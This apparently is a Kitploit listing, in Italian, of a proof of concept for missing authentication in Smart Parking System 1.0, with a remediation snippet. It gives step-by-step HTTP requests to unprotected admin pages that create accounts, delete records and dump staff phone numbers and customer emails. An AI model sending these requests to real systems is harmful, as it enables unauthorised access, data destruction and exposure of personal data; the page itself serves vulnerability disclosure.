Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-10243-AUTH — Prova di concetto che dimostra l'accesso non autenticato a funzioni amministrative critiche in Smart Parking System 1.0, consentendo la creazione di account, la manipolazione dei dati e l'esposizione di PII. | Kitploit
Strumenti/GitHubGitHub/xmyronn/cve-2026-10243-auth
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingAutenticazione
GitHubxmyronn/cve-2026-10243-auth

CVE-2026-10243-AUTH

Prova di concetto che dimostra l'accesso non autenticato a funzioni amministrative critiche in Smart Parking System 1.0, consentendo la creazione di account, la manipolazione dei dati e l'esposizione di PII.

Vedi Repository
54 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Smart Parking System 1.0 - Accesso non autenticato a funzioni amministrative critiche

Informazioni sulla vulnerabilità

CampoDettagli
ProdottoSmart Parking System
Venditorecode-projects.org
Versione1.0
Classe di vulnerabilitàAutenticazione mancante per funzioni critiche (CWE-306)
ID CVEIn attesa
Punteggio CVSS9.8 Critico (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
Autenticazione richiestaNessuna
File interessatiattendant.php, edit.php, basic_table.php, basic_table2.php, admin_request.php

Descrizione

Lo Smart Parking System 1.0 di code-projects.org non applica l'autenticazione su più endpoint riservati agli amministratori. Un attaccante remoto non autenticato può accedere direttamente a questi endpoint senza cookie di sessione ed eseguire operazioni privilegiate, tra cui la creazione di account per gli addetti al parcheggio, la modifica e l'eliminazione dei record di parcheggio e la visualizzazione di tutti i dati personali dei clienti e dei dati di prenotazione.

Non sono richieste credenziali, token di sessione o interazione da parte di alcun utente legittimo per sfruttare questa vulnerabilità.


Panoramica della catena di attacco

root@kitploit:~
Nessuna credenziale / nessuna sessione
        ↓
Richiesta GET diretta agli endpoint admin
        ↓
attendant.php     → crea account addetti al parcheggio non autorizzati
edit.php          → legge e sovrascrive qualsiasi record di parcheggio
basic_table.php   → elimina qualsiasi record di parcheggio
basic_table2.php  → esporta tutti i dati personali degli addetti
admin_request.php → esporta tutte le email dei clienti e i dati di prenotazione
        ↓
Funzionalità amministrative complete compromesse

Prova di concetto passo dopo passo

Passo 1 — Confermare lo stato non autenticato

Aprire una nuova sessione del browser senza cookie. Navigare alla radice dell'applicazione. Viene presentata la pagina di login che conferma l'assenza di una sessione attiva:

root@kitploit:~
GET /SMART_PARKING_SYSTEM_IN_PHP_WITH_SOURCE_CODE/ HTTP/1.1
Host: 192.168.0.9

Passo 2 — Accedere al pannello di creazione addetti (senza autenticazione)

Navigare direttamente all'endpoint di registrazione degli addetti:

root@kitploit:~
GET /SMART_PARKING_SYSTEM_IN_PHP_WITH_SOURCE_CODE/attendant.php HTTP/1.1
Host: 192.168.0.9

Risultato: Il modulo completo "Add Parking Attendant Details" viene caricato con campi per nome, cognome, numero di cellulare, via, nome utente e password. Un attaccante può registrare un account addetto non autorizzato con accesso al sistema.


Passo 3 — Leggere e modificare i record di parcheggio (senza autenticazione)

Navigare direttamente all'endpoint di modifica dei record di parcheggio:

root@kitploit:~
GET /SMART_PARKING_SYSTEM_IN_PHP_WITH_SOURCE_CODE//edit.php?edit=5 HTTP/1.1
Host: 192.168.0.9

Risultato: Il modulo "Update Parkings Details" viene caricato precompilato con valori live del database:

root@kitploit:~
City:   Mombasa
Street: Tudor
Slots:  150
Cost:   500

Un attaccante può sovrascrivere qualsiasi campo e inviare per salvare le modifiche direttamente nel database.


Passo 4 — Eliminare un record di parcheggio (senza autenticazione)

Inviare una richiesta GET diretta all'endpoint di eliminazione:

root@kitploit:~
GET /SMART_PARKING_SYSTEM_IN_PHP_WITH_SOURCE_CODE/basic_table.php?delete=4 HTTP/1.1
Host: 192.168.0.9

Risultato: L'applicazione risponde con:

root@kitploit:~
Parking deleted successfully

Il record viene distrutto definitivamente nel database. Nessuna autenticazione, nessun token CSRF e nessuna richiesta di conferma richiesti.


Passo 5 — Esportare tutti gli addetti al parcheggio (senza autenticazione)

Navigare direttamente all'endpoint di elenco degli addetti:

root@kitploit:~
GET /SMART_PARKING_SYSTEM_IN_PHP_WITH_SOURCE_CODE//basic_table2.php HTTP/1.1
Host: 192.168.0.9

Risultato: Viene restituito l'elenco completo degli addetti, inclusi nomi, numeri di cellulare e vie assegnate:

root@kitploit:~
karis  kelvin  070824555  msa
king   doshi   0708009360 Nairobi
james  peter   0708009360 vol
tset   test    0708009360 tset

Passo 6 — Esportare tutti i dati di prenotazione dei clienti (senza autenticazione)

Navigare direttamente all'endpoint delle richieste di prenotazione admin:

root@kitploit:~
GET /SMART_PARKING_SYSTEM_IN_PHP_WITH_SOURCE_CODE//admin_request.php HTTP/1.1
Host: 192.168.0.9

Risultato: Vengono restituiti tutti i record di prenotazione dei clienti, inclusi email, slot, ore e costi:

root@kitploit:~
[email protected]   slots:4  hours:2  cost:4000  status:requested
[email protected]   slots:1  hours:6  cost:1200  status:Completed
[email protected]    slots:1  hours:2  cost:1000  status:requested
[email protected]       slots:1  hours:1  cost:500   status:requested
[email protected]        slots:1  hours:1  cost:500   status:requested
[email protected]    slots:1  hours:1  cost:500   status:requested
[email protected]    slots:1  hours:3  cost:0     status:requested
[email protected]       slots:1  hours:2  cost:1000  status:requested

Impatto

  • Accesso completo al pannello admin — tutte le funzionalità privilegiate raggiungibili senza alcuna credenziale
  • Distruzione dei dati — qualsiasi record di parcheggio può essere eliminato definitivamente
  • Manipolazione dei dati — qualsiasi record di parcheggio può essere modificato
  • Escalation dei privilegi — account addetti non autorizzati creabili con accesso al sistema
  • Esposizione di dati personali — tutte le email dei clienti e la cronologia delle prenotazioni raccolte
  • Fuga di dati degli addetti — elenco completo con nomi e numeri di telefono esposto

Riepilogo dei file interessati

FileVulnerabilità
attendant.phpCreazione non autenticata di account addetti
edit.phpAccesso non autenticato in lettura/scrittura ai record di parcheggio
basic_table.phpEliminazione non autenticata dei record di parcheggio
basic_table2.phpAccesso non autenticato a tutti i dati personali degli addetti
admin_request.phpAccesso non autenticato a tutti i dati di prenotazione dei clienti

Rimedio

Aggiungere un controllo di autenticazione della sessione all'inizio di ogni file PHP rivolto all'amministrazione:

root@kitploit:~
session_start();
if (!isset($_SESSION['admin']) || $_SESSION['admin'] !== true) {
    header("Location: index.php");
    exit();
}

Riferimenti

  • Homepage del venditore
  • CWE-306: Autenticazione mancante per funzioni critiche
  • OWASP: Controllo di accesso interrotto

Scopritore

  • Ricercatore: Imad Alvi
Scarica lo strumento